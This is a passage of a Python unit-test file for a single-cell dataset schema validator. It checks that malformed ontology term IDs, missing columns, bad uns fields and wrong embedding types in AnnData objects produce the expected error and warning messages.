It is \"\n \"STRONGLY RECOMMENDED to use this type of matrix for \"\n \"the given sparsity.\"\n ],\n )\n\n def test_raw_existence(self):\n\n \"\"\"\n Except for ATAC-seq and methylation data, raw data is REQUIRED\n \"\"\"\n\n # RNA - raw layer required\n del self.validator.adata.raw\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: Raw data is missing: there is no 'raw.X' and 'X_normalization' is not 'none'.\"\n ],\n )\n\n # ATAC - raw layer not required\n # The assignment above makes X to not be raw: self.validator.adata.uns[\"X_normalization\"] = \"CPM\"\n # The following line makes it to be scATAC-seq data (EFO:0010891)\n # Missing raw data in atac-seq data is allowed, thus the following should not return an error message\n self.validator.errors = []\n self.validator.adata.obs[\"assay_ontology_term_id\"] = \"EFO:0010891\"\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [])\n\n def test_final_strongly_recommended(self):\n\n \"\"\"\n Except for ATAC-seq and methylation data, final matrix is STRONGLY RECOMMENDED\n \"\"\"\n\n # move raw to X amd: i.e. there is no final\n self.validator.adata.X = self.validator.adata.raw.X\n del self.validator.adata.raw\n self.validator.adata.uns[\"X_normalization\"] = \"none\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.warnings,\n [\n \"WARNING: Only raw data was found, i.e. there is no 'raw.X' and 'uns['X_normalization']' is 'none'. \"\n \"It is STRONGLY RECOMMENDED that 'final' (normalized) data is provided.\"\n ],\n )\n\n\nclass TestObs(unittest.TestCase):\n\n \"\"\"\n Fail cases in adata.uns\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_column_presence(self):\n \"\"\"\n obs is a pandas.DataFrame. Curators MUST annotate the following columns in the obs dataframe.\n \"\"\"\n\n columns = [\n \"assay_ontology_term_id\",\n \"development_stage_ontology_term_id\",\n \"disease_ontology_term_id\",\n \"ethnicity_ontology_term_id\",\n \"is_primary_data\",\n \"sex_ontology_term_id\",\n \"tissue_ontology_term_id\",\n ]\n\n for column in columns:\n with self.subTest(column=column):\n self.validator.errors = []\n self.validator.adata = examples.adata.copy()\n\n self.validator.adata.obs.drop(column, axis=1, inplace=True)\n # Remove batch condition because it has a dependency with is_primary_data\n self.validator.adata.uns.pop(\"batch_condition\")\n\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [f\"ERROR: Dataframe 'obs' is missing \" f\"column '{column}'.\"],\n )\n\n def test_column_presence_organism(self):\n \"\"\"\n obs is a pandas.DataFrame. 
Curators MUST annotate the following columns in the obs dataframe.\n\n A separate check is need for organism_ontology_term_id because removing from anndata results in multiple\n errors given that other columns depend on its presence\n \"\"\"\n\n self.validator.adata.obs.drop(\"organism_ontology_term_id\", axis=1, inplace=True)\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: Dataframe 'obs' is missing column \"\n \"'organism_ontology_term_id'.\",\n \"ERROR: Checking values with dependencies failed for \"\n \"adata.obs['ethnicity_ontology_term_id'], this is likely due \"\n \"to missing dependent column in adata.obs.\",\n \"ERROR: Checking values with dependencies failed for \"\n \"adata.obs['development_stage_ontology_term_id'], this is likely due \"\n \"to missing dependent column in adata.obs.\",\n ],\n )\n\n def test_obsolete_term_id(self):\n \"\"\"\n Terms documented as obsolete in an ontology MUST NOT be used. For example, EFO:0009310\n for obsolete_10x v2 was marked as obsolete in EFO version 3.31.0 and replaced by\n EFO:0009899 for 10x 3' v2.\n\n https://www.ebi.ac.uk/ols/ontologies/efo/terms?short_form=EFO_0009310\n \"\"\"\n\n # Not a valid term\n self.validator.adata.obs[\"assay_ontology_term_id\"][0] = \"EFO:0009310\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0009310' in 'assay_ontology_term_id' is a deprecated term id of 'EFO'.\",\n \"ERROR: 'EFO:0009310' in 'assay_ontology_term_id' is not a child term id \"\n \"of '[['EFO:0002772', 'EFO:0010183']]'.\",\n ],\n )\n\n def test_assay_ontology_term_id(self):\n\n \"\"\"\n assay_ontology_term_id categorical with str categories.\n This MUST be an EFO term and either child of \"EFO:0002772\" or \"EFO:0010183\"\n If there is not an exact match for the assay, clarifying text MAY be enclosed in parentheses and appended to\n the most accurate term. For example, the sci-plex assay could be curated as \"EFO:0010183 (sci-plex)\"\n \"\"\"\n\n # Not a valid term\n self.validator.adata.obs[\"assay_ontology_term_id\"][0] = \"CL:000001\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'CL:000001' in 'assay_ontology_term_id' is not a valid \"\n \"ontology term id of 'EFO'.\",\n \"ERROR: 'CL:000001' in 'assay_ontology_term_id' is not a child \"\n \"term id of '[['EFO:0002772', 'EFO:0010183']]'.\",\n ],\n )\n\n # Not a valid child\n self.validator.adata.obs[\"assay_ontology_term_id\"][0] = \"EFO:0000001\"\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0000001' in 'assay_ontology_term_id' is not a \"\n \"child term id of '[['EFO:0002772', 'EFO:0010183']]'.\"\n ],\n )\n\n # Not a clarifying text\n self.validator.adata.obs[\"assay_ontology_term_id\"][0] = \"EFO:0010183 sci-plex\"\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0010183 sci-plex' in 'assay_ontology_term_id' is not a valid ontology term id of 'EFO'.\",\n \"ERROR: 'EFO:0010183 sci-plex' in 'assay_ontology_term_id' is not a child term id of \"\n \"'[['EFO:0002772', 'EFO:0010183']]'.\",\n ],\n )\n\n def test_cell_type_ontology_term_id(self):\n\n \"\"\"\n cell_type_ontology_term_id categorical with str categories. 
This MUST be a CL term.\n \"\"\"\n\n # Not a valid term\n self.validator.adata.obs[\"cell_type_ontology_term_id\"][0] = \"EFO:0000001\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0000001' in 'cell_type_ontology_term_id' is not a valid \"\n \"ontology term id of 'CL'.\"\n ],\n )\n\n def test_development_stage_ontology_term_id_human(self):\n\n \"\"\"\n development_stage_ontology_term_id categorical with str categories. If unavailable, this MUST be \"unknown\".\n If organism_ontolology_term_id is \"NCBITaxon:9606\" for Homo sapiens,\n this MUST be the most accurate HsapDv term.\n \"\"\"\n\n self.validator.adata.obs[\"organism_ontology_term_id\"][0] = \"NCBITaxon:9606\"\n self.validator.adata.obs[\"development_stage_ontology_term_id\"][\n 0\n ] = \"EFO:0000001\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is \"\n \"not a valid ontology term id of 'HsapDv'. When 'organism_ontology_term_id' is 'NCBITaxon:9606' \"\n \"(Homo sapiens), 'development_stage_ontology_term_id' MUST be a term id of 'HsapDv' or unknown.\"\n ],\n )\n\n def test_development_stage_ontology_term_id_mouse(self):\n \"\"\"\n If organism_ontolology_term_id is \"NCBITaxon:10090\" for Mus musculus,\n this MUST be the most accurate MmusDv term\n \"\"\"\n\n self.validator.adata.obs[\"organism_ontology_term_id\"][0] = \"NCBITaxon:10090\"\n self.validator.adata.obs[\"development_stage_ontology_term_id\"][\n 0\n ] = \"EFO:0000001\"\n self.validator.adata.obs[\"ethnicity_ontology_term_id\"][0] = \"na\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is \"\n \"not a valid ontology term id of 'MmusDv'. When 'organism_ontology_term_id' is 'NCBITaxon:10090' \"\n \"(Mus musculus), 'development_stage_ontology_term_id' MUST be a term id of 'MmusDv' or unknown.\"\n ],\n )\n\n def test_development_stage_ontology_term_id_all_species(self):\n\n \"\"\"\n All other it MUST be children of UBERON:0000105 and not UBERON:0000071\n \"\"\"\n\n # Fail case not an UBERON term\n self.validator.adata.obs[\"organism_ontology_term_id\"][0] = \"NCBITaxon:10114\"\n self.validator.adata.obs[\"development_stage_ontology_term_id\"][\n 0\n ] = \"EFO:0000001\"\n self.validator.adata.obs[\"ethnicity_ontology_term_id\"][0] = \"na\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is \"\n \"not a valid ontology term id of 'UBERON'. When 'organism_ontology_term_id' is not 'NCBITaxon:10090' \"\n \"nor 'NCBITaxon:9606', 'development_stage_ontology_term_id' MUST be a child term id of \"\n \"'UBERON:0000105' excluding 'UBERON:0000071', or unknown.\",\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is not \"\n \"a child term id of '[['UBERON:0000105']]'. 
When 'organism_ontology_term_id' is not 'NCBITaxon:10090' \"\n \"nor 'NCBITaxon:9606', 'development_stage_ontology_term_id' MUST be a child term id of \"\n \"'UBERON:0000105' excluding 'UBERON:0000071', or unknown.\",\n ],\n )\n\n # All other it MUST be children of UBERON:0000105 and not UBERON:0000071\n # Fail case UBERON:0000071\n self.validator.errors = []\n self.validator.adata.obs[\"organism_ontology_term_id\"][0] = \"NCBITaxon:10114\"\n self.validator.adata.obs[\"development_stage_ontology_term_id\"][\n 0\n ] = \"UBERON:0000071\"\n self.validator.adata.obs[\"ethnicity_ontology_term_id\"][0] = \"na\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'UBERON:0000071' in 'development_stage_ontology_term_id' is not allowed'. When \"\n \"'organism_ontology_term_id' is not 'NCBITaxon:10090' \"\n \"nor 'NCBITaxon:9606', 'development_stage_ontology_term_id' MUST be a child term id of \"\n \"'UBERON:0000105' excluding 'UBERON:0000071', or unknown.\",\n ],\n )\n\n def test_disease_ontology_term_id(self):\n\n \"\"\"\n disease_ontology_term_id categorical with str categories. This MUST be a MONDO term or\n PATO:0000461 for normal or healthy.\n \"\"\"\n\n # Invalid ontology\n self.validator.adata.obs[\"disease_ontology_term_id\"][0] = \"EFO:0000001\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0000001' in 'disease_ontology_term_id' is not a \"\n \"valid ontology term id of 'MONDO, PATO'. Only 'PATO:0000461' is allowed for 'PATO' term ids.\"\n ],\n )\n\n # Invalid PATO term id\n self.validator.errors = []\n self.validator.adata.obs[\"disease_ontology_term_id\"][0] = \"PATO:0001894\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'PATO:0001894' in 'disease_ontology_term_id' is not an allowed term: '[['PATO:0000461']]'. \"\n \"Only 'PATO:0000461' is allowed for 'PATO' term ids.\"\n ],\n )\n\n def test_ethnicity_ontology_term_id(self):\n\n \"\"\"\n ethnicity_ontology_term_id categorical with str categories.\n If organism_ontolology_term_id is \"NCBITaxon:9606\" for Homo sapiens,\n this MUST be either a HANCESTRO term or \"unknown\" if unavailable.\n Otherwise, for all other organisms this MUST be \"na\".\n \"\"\"\n\n # If organism_ontolology_term_id is \"NCBITaxon:9606\" for Homo sapiens,\n # this MUST be either a HANCESTRO term or \"unknown\" if unavailable.\n self.validator.adata.obs[\"organism_ontology_term_id\"][0] = \"NCBITaxon:9606\"\n self.validator.adata.obs[\"ethnicity_ontology_term_id\"][0] = \"EFO:0000001\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0000001' in 'ethnicity_ontology_term_id' is \"\n \"not a valid ontology term id of 'HANCESTRO'. When 'organism_ontology_term_id' is 'NCBITaxon:9606' \"\n \"(Homo sapiens), ethnicity_ontology_term_id MUST be a term id of 'HANCESTRO' or 'unknown'.\"\n ],\n )\n\n # Otherwise, for all other organisms this MUST be \"na\". 
Below is the test case for mouse data.\n # development_stage_ontology_term_id has to be set to an appropriate mouse term id, otherwise there\n # will be an error in that field.\n self.validator.errors = []\n self.validator.adata.obs[\"organism_ontology_term_id\"][0] = \"NCBITaxon:10090\"\n self.validator.adata.obs[\"development_stage_ontology_term_id\"][\n 0\n ] = \"MmusDv:0000003\"\n self.validator.adata.obs[\"ethnicity_ontology_term_id\"][0] = \"EFO:0000001\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0000001' in 'ethnicity_ontology_term_id' is not a \"\n \"valid value of 'ethnicity_ontology_term_id'. When 'organism_ontology_term_id' is NOT 'NCBITaxon:9606' \"\n \"(Homo sapiens), ethnicity_ontology_term_id MUST be 'na'.\"\n ],\n )\n\n def test_organism_ontology_term_id(self):\n\n \"\"\"\n organism_ontology_term_id categorical with str categories. This MUST be a child of NCBITaxon:33208.\n \"\"\"\n\n # Setting \"organism_ontology_term_id\" to \"EFO:0000001\" is the fail case. However since this represents neither\n # human nor mouse, then two other columns that are dependent on it need to be set appropriately to avoid\n # other error messages: \"development_stage_ontology_term_id\" and \"ethnicity_ontology_term_id\"\n self.validator.adata.obs[\"organism_ontology_term_id\"][0] = \"EFO:0000001\"\n self.validator.adata.obs[\"development_stage_ontology_term_id\"][0] = \"unknown\"\n self.validator.adata.obs[\"ethnicity_ontology_term_id\"][0] = \"na\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0000001' in 'organism_ontology_term_id' is not a valid \"\n \"ontology term id of 'NCBITaxon'. Only children term ids of 'NCBITaxon:33208' for metazoan are allowed.\"\n ],\n )\n\n def test_tissue_ontology_term_id_base(self):\n\n \"\"\"\n tissue_ontology_term_id categorical with str categories. 
This MUST be the term that best describes the tissue\n that this cell was derived from, depending on the type of biological sample:\n \"\"\"\n\n self.validator.adata.obs[\"tissue_ontology_term_id\"][0] = \"EFO:0000001\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0000001' in 'tissue_ontology_term_id' is not a \"\n \"valid ontology term id of 'UBERON, CL'.\"\n ],\n )\n\n def test_tissue_ontology_term_id_cell_culture(self):\n\n \"\"\"\n Cell Culture - MUST be a CL term appended with \" (cell culture)\"\n \"\"\"\n\n self.validator.adata.obs[\"tissue_ontology_term_id\"][\n 0\n ] = \"CL:0000057 (CELL culture)\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'CL:0000057 (CELL culture)' in 'tissue_ontology_term_id' is \"\n \"not a valid ontology term id of 'UBERON, CL'.\"\n ],\n )\n\n def test_tissue_ontology_term_id_organoid(self):\n\n \"\"\"\n Organoid - MUST be an UBERON term appended with \" (organoid)\"\n \"\"\"\n\n self.validator.adata.obs[\"tissue_ontology_term_id\"][0] = \"CL:0000057 (ORGANOID)\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'CL:0000057 (ORGANOID)' in 'tissue_ontology_term_id' is \"\n \"not a valid ontology term id of 'UBERON, CL'.\"\n ],\n )\n\n def test_sex_ontology_term_id(self):\n\n \"\"\"\n sex_ontology_term_id categorical with str categories.\n This MUST be a child of PATOPATO:0001894 for phenotypic sex or \"unknown\" if unavailable\n \"\"\"\n\n self.validator.adata.obs[\"sex_ontology_term_id\"][0] = \"EFO:0000001\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0000001' in 'sex_ontology_term_id' is \"\n \"not a valid ontology term id of 'PATO'. Only 'PATO:0000383', 'PATO:0000384', 'PATO:0001340', \"\n \"or 'unknown' are allowed.\"\n ],\n )\n\n def test_is_primary_data(self):\n\n \"\"\"\n is_primary_data\tbool. This MUST be True if this is the canonical instance of this cellular\n observation and False if not. This is commonly False\n for meta-analyses reusing data or for secondary views of data.\n \"\"\"\n\n self.validator.adata.obs[\"is_primary_data\"] = \"FALSE\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: Column 'is_primary_data' in dataframe 'obs' \"\n \"must be boolean, not 'object'.\"\n ],\n )\n\n\nclass TestVar(unittest.TestCase):\n\n \"\"\"\n Fail cases in adata.var and adata.raw.var\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_var_and_raw_var_same_index(self):\n\n \"\"\"\n var.index MUST contain unique identifiers for features. 
raw.var.index MUST be identical to var.index.\n \"\"\"\n\n # Swap first row for second one\n var = Validator.getattr_anndata(self.validator.adata, \"var\")\n\n # First swap the index\n new_index = list(var.index)\n tmp = new_index[0]\n new_index[0] = new_index[1]\n new_index[1] = tmp\n var.set_index(pd.Index(new_index), inplace=True)\n\n # Then swap the actual rows\n tmp = var.iloc[0, :].copy()\n var.iloc[0, :] = var.iloc[1, :].copy()\n var.iloc[1, :] = tmp\n\n self.validator.validate_adata()\n print(\"FOO\", self.validator.errors)\n self.assertEqual(\n self.validator.errors,\n [\"ERROR: Index of 'raw.var' is not identical to index of 'var'.\"],\n )\n\n def test_check_unique_var(self):\n\n \"\"\"\n var.index MUST contain unique ENSEMBL gene identifiers for features.\n \"\"\"\n\n for component_name in [\"var\", \"raw.var\"]:\n with self.subTest(component_name=component_name):\n\n # Resetting validator\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n\n # Duplicate 1st row in var and assign it to 2nd\n component = Validator.getattr_anndata(\n self.validator.adata, component_name\n )\n new_index = list(component.index)\n new_index[1] = new_index[0]\n component.set_index(pd.Index(new_index), inplace=True)\n component.iloc[1, :] = component.iloc[0, :]\n\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n f\"ERROR: Column 'index' in dataframe '{component_name}' is not unique.\"\n ],\n )\n\n def test_column_presence(self):\n \"\"\"\n var is a pandas.DataFrame. Curators MUST annotate the following columns in the obs dataframe.\n feature_is_filtered must not be in raw.var, and it's only checked in var\n \"\"\"\n\n columns = [\"feature_is_filtered\", \"feature_biotype\"]\n\n for component_name in [\"var\", \"raw.var\"]:\n for column in columns:\n if column == \"feature_is_filtered\" and component_name == \"raw.var\":\n continue\n with self.subTest(component_name=component_name, column=column):\n\n # Resetting validator\n self.validator.errors = []\n self.validator.adata = examples.adata.copy()\n\n component = Validator.getattr_anndata(\n self.validator.adata, component_name\n )\n component.drop(column, axis=1, inplace=True)\n\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n f\"ERROR: Dataframe '{component_name}' is missing \"\n f\"column '{column}'.\"\n ],\n )\n\n def test_feature_is_filtered(self):\n\n \"\"\"\n feature_is_filtered bool. This MUST be True if the feature was filtered out in the final matrix (X)\n but is present in the raw matrix (raw.X). The value for all cells of the given feature in the\n final matrix MUST be 0.\n\n Otherwise, this MUST be False.\n \"\"\"\n\n # Duplicate 1st row in var and assigned to 2nd\n self.validator.adata.var[\"feature_is_filtered\"][0] = True\n for i in range(self.validator.adata.X.shape[0]):\n self.validator.adata.X[i, 0] = 0\n self.validator.adata.X[0, 0] = 1\n\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: Some features are 'True' in 'feature_is_filtered' of dataframe 'var', \"\n \"but there are 1 non-zero values in the corresponding columns of the matrix 'X'. 
\"\n \"All values for these features must be 0.\"\n ],\n )\n\n def test_columns_not_in_raw_var(self):\n\n \"\"\"\n Curators MUST annotate the following column only in the var dataframe.\n This column MUST NOT be present in raw.var:\n feature_is_filtered\n \"\"\"\n\n self.validator.adata.raw = self.validator.adata\n self.validator.adata.uns[\"X_normalization\"] = \"CPM\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\"ERROR: Column 'feature_is_filtered' must not be present in 'raw.var'.\"],\n )\n\n def test_feature_id_wrong_format(self):\n\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ID with an incorrect format \"ENSEBML_NOGENE\"\n \"\"\"\n\n for component_name in [\"var\", \"raw.var\"]:\n with self.subTest(component_name=component_name):\n\n # Resetting validator\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n\n component = Validator.getattr_anndata(\n self.validator.adata, component_name\n )\n\n new_index = list(component.index)\n new_index[0] = \"ENSEBML_NOGENE\"\n component.set_index(pd.Index(new_index), inplace=True)\n component[\"feature_biotype\"][0] = \"gene\"\n\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n f\"ERROR: Could not infer organism from feature ID 'ENSEBML_NOGENE' \"\n f\"in '{component_name}', make sure it is a valid ID.\"\n ],\n )\n\n def test_feature_id_non_existent_ensembl(self):\n\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ENSEMBL ID that has the right format but doesn't exist\n \"\"\"\n\n for component_name in [\"var\", \"raw.var\"]:\n with self.subTest(component_name=component_name):\n # Resetting validator\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n\n component = Validator.getattr_anndata(\n self.validator.adata, component_name\n )\n\n new_index = list(component.index)\n new_index[0] = \"ENSG000\"\n component.set_index(pd.Index(new_index), inplace=True)\n component[\"feature_biotype\"][0] = \"gene\"\n\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n f\"ERROR: 'ENSG000' is not a valid feature ID in '{component_name}'.\"\n ],\n )\n\n def test_feature_id_non_existent_ercc(self):\n\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ERCC ID that has the right format but doesn't exist\n \"\"\"\n\n for component_name in [\"var\", \"raw.var\"]:\n with self.subTest(component_name=component_name):\n # Resetting validator\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n\n component = Validator.getattr_anndata(\n self.validator.adata, component_name\n )\n\n new_index = list(component.index)\n new_index[0] = \"ERCC-000000\"\n component.set_index(pd.Index(new_index), inplace=True)\n component[\"feature_biotype\"][0] = \"spike-in\"\n\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n f\"ERROR: 'ERCC-000000' is not a valid feature ID in '{component_name}'.\"\n ],\n )\n\n\nclass TestUns(unittest.TestCase):\n\n 
\"\"\"\n Fail cases in adata.uns\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_required_fields_schema_version(self):\n\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (schema_version)\n \"\"\"\n\n del self.validator.adata.uns[\"schema_version\"]\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: adata has no schema definition in 'adata.uns'. \"\n \"Validation cannot be performed.\"\n ],\n )\n\n def test_required_fields_title(self):\n\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (title)\n \"\"\"\n\n del self.validator.adata.uns[\"title\"]\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors, [\"ERROR: 'title' in 'uns' is not present.\"]\n )\n\n def test_required_fields_X_normalization(self):\n\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (X_normalization)\n \"\"\"\n\n del self.validator.adata.uns[\"X_normalization\"]\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors, [\"ERROR: 'X_normalization' in 'uns' is not present.\"]\n )\n\n def test_leading_trailing_double_spaces_in_strings(self):\n\n \"\"\"\n The following sequences MUST NOT appear in str types documented in the schema:\n Leading control or space separators - ” This is an example”\n Trailing control or space separators - “This is an example ”\n Multiple (internal) control or space separators - \"This is an example\"\n \"\"\"\n\n self.validator.adata.uns[\"title\"] = \" There is a leading space\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: ' There is a leading space' in 'uns['title']' is not valid, it contains leading spaces.\"\n ],\n )\n\n self.validator.adata.uns[\"title\"] = \"There is a trailing space \"\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'There is a trailing space ' in 'uns['title']' is not valid, it contains trailing spaces.\"\n ],\n )\n\n self.validator.adata.uns[\"title\"] = \"There are double spaces\"\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'There are double spaces' in 'uns['title']' is not valid, it contains double spaces.\"\n ],\n )\n\n def test_schema_version(self):\n\n \"\"\"\n Schema_version, This MUST be \"2.0.0\".\n \"\"\"\n\n self.validator.adata.uns[\"schema_version\"] = \"1.0.0\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: Schema version '1.0.0' is not supported. Current supported versions: '['2.0.0']'. 
\"\n \"Validation cannot be performed.\"\n ],\n )\n\n def test_title(self):\n\n \"\"\"\n Title MUST be a string\n \"\"\"\n\n # list instead of string\n self.validator.adata.uns[\"title\"] = [\"title\"]\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: '['title']' in 'uns['title']' is not valid, \"\n \"it must be a string.\"\n ],\n )\n\n def test_X_normalization_is_str(self):\n\n \"\"\"\n X_normalization str.\n \"\"\"\n\n # list instead of string\n self.validator.adata.uns[\"X_normalization\"] = [\"normalization\"]\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: '['normalization']' in 'uns['X_normalization']' is \"\n \"not valid, it must be a string.\"\n ],\n )\n\n def test_X_normalization_not_raw(self):\n\n \"\"\"\n X_normalization str. This SHOULD describe the method used to normalize the data stored in AnnData X.\n If data in X are raw, this SHOULD be \"none\".\n\n FAIL CASE for when X_normalization was set to \"none\" but X may not be raw data\n \"\"\"\n\n # Assign a real value to X while X_normalization is 'none'\n del self.validator.adata.raw\n self.validator.adata.uns[\"X_normalization\"] = \"none\"\n self.validator.validate_adata()\n print(\"FOO\", self.validator.warnings)\n self.assertEqual(\n self.validator.warnings,\n [\n \"WARNING: uns['X_normalization'] is 'none', there is no 'raw.X' and 'X' doesn't appear \"\n \"to have raw counts (integers)\"\n ],\n )\n\n def test_batch_condition_is_list(self):\n\n \"\"\"\n batch_condition list[str]\n \"\"\"\n\n # Check valid case of numpy array which is interchangeable with lists\n self.validator.adata.uns[\"batch_condition\"] = numpy.array(\n self.validator.adata.uns[\"batch_condition\"]\n )\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [])\n\n # Check fail case: not a list nor numpy array\n self.validator.adata.uns[\"batch_condition\"] = \"cell_type_ontology_term_id\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'cell_type_ontology_term_id' in 'uns['batch_condition']' \"\n \"is not valid, it must be a list or numpy array.\"\n ],\n )\n\n def test_batch_condition_is_column_from_obs(self):\n\n \"\"\"\n batch_condition list[str]. str values MUST refer to cell metadata keys in obs.\n \"\"\"\n\n self.validator.adata.uns[\"batch_condition\"] = [\"NO_COLUMN\"]\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: Value 'NO_COLUMN' of list 'batch_condition' is not a \"\n \"column in 'adata.obs'.\"\n ],\n )\n\n def test_default_embedding_is_str(self):\n\n \"\"\"\n Default_embedding str.\n \"\"\"\n\n self.validator.adata.uns[\"default_embedding\"] = [\"X_umap\"]\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: '['X_umap']' in 'uns['default_embedding']' is not valid, \"\n \"it must be a string.\"\n ],\n )\n\n def test_default_embedding_is_key_from_obsm(self):\n\n \"\"\"\n Default_embedding str. The value MUST match a key to an embedding in obsm\n \"\"\"\n\n self.validator.adata.uns[\"default_embedding\"] = \"X_other\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'X_other' in 'uns['default_embedding']' is not valid, \"\n \"it must be a key of 'adata.obsm'.\"\n ],\n )\n\n def test_X_approximate_distribution_is_str(self):\n\n \"\"\"\n X_approximate_distribution str. The value MUST be \"count\" [...] 
or \"normal\".\n Note that `normal` is tested in the happy path test case using `good_uns`.\n \"\"\"\n\n # Check valid case of \"count\" which is not included in valid object\n self.validator.adata.uns[\"X_approximate_distribution\"] = \"count\"\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [])\n\n # Invalid type: list\n self.validator.adata.uns[\"X_approximate_distribution\"] = [\"count\"]\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: '['count']' in 'uns['X_approximate_distribution']' \"\n \"is not valid, it must be a string.\"\n ],\n )\n\n def test_X_approximate_distribution_is_valid(self):\n\n \"\"\"\n X_approximate_distribution str. The value MUST be \"count\" [...] or \"normal\"\n \"\"\"\n\n self.validator.adata.uns[\"X_approximate_distribution\"] = \"COUNT\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'COUNT' in 'uns['X_approximate_distribution']' is \"\n \"not valid. Allowed terms: ['count', 'normal'].\"\n ],\n )\n\n\nclass TestObsm(unittest.TestCase):\n\n \"\"\"\n Fail cases for adata.obsm\n \"\"\"\n\n def setUp(self):\n\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_obsm_values_ara_numpy(self):\n\n \"\"\"\n values in obsm MUST be a numpy.ndarray\n \"\"\"\n\n self.validator.adata.obsm[\"X_tsne\"] = pd.DataFrame(\n self.validator.adata.obsm[\"X_umap\"], index=self.validator.adata.obs_names\n )\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: All embeddings have to be of 'numpy.ndarray' type, \"\n \"'adata.obsm['X_tsne']' is <class 'pandas.core.frame.DataFrame'>').\"\n ],\n 